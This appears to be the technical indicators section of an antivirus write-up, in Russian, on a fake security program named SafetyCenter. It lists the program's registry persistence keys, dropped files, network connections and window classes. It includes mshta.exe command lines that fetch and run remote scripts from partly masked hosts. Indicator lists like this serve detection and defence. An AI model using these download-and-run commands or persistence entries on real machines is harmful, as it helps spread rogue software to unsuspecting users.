Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'SafetyCenter' = '%PROGRAM_FILES%\SafetyCenter\start.exe'
- [<HKLM>\SOFTWARE\Classes\CLSID\{459b6bf8-5320-4c41-8833-85baedf31086}\Shell\Open\Command] '' = '%PROGRAM_FILES%\SafetyCenter\protector.exe'
- '<SYSTEM32>\mshta.exe' http://ur###nam.net/8732489273.php
- '<SYSTEM32>\mshta.exe' http://21#.#17.160.18/install.php?id#
- ICQ.exe
- firefox.exe
- %PROGRAM_FILES%\SafetyCenter\new.exe
- %PROGRAM_FILES%\SafetyCenter\start.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\8732489273[1].php
- %PROGRAM_FILES%\SafetyCenter\uninstall.exe
- %PROGRAM_FILES%\SafetyCenter\protector.exe
- %PROGRAM_FILES%\SafetyCenter\sound.wav
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\install[1].php
- %PROGRAM_FILES%\SafetyCenter\tst.exe
- %PROGRAM_FILES%\SafetyCenter\main.ico
- 'localhost':1037
- 'ur###nam.net':80
- 'localhost':1035
- '21#.#17.160.18':80
- ur###nam.net/8732489273.php
- 21#.#17.160.18/install.php?id#
- DNS ASK ur###nam.net
- ClassName: 'HTML Application Host Window Class' WindowName: 'c71e7a0f-e634-4e08-8a6e-64709a09dd18'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'TForm1' WindowName: 'Safety Center'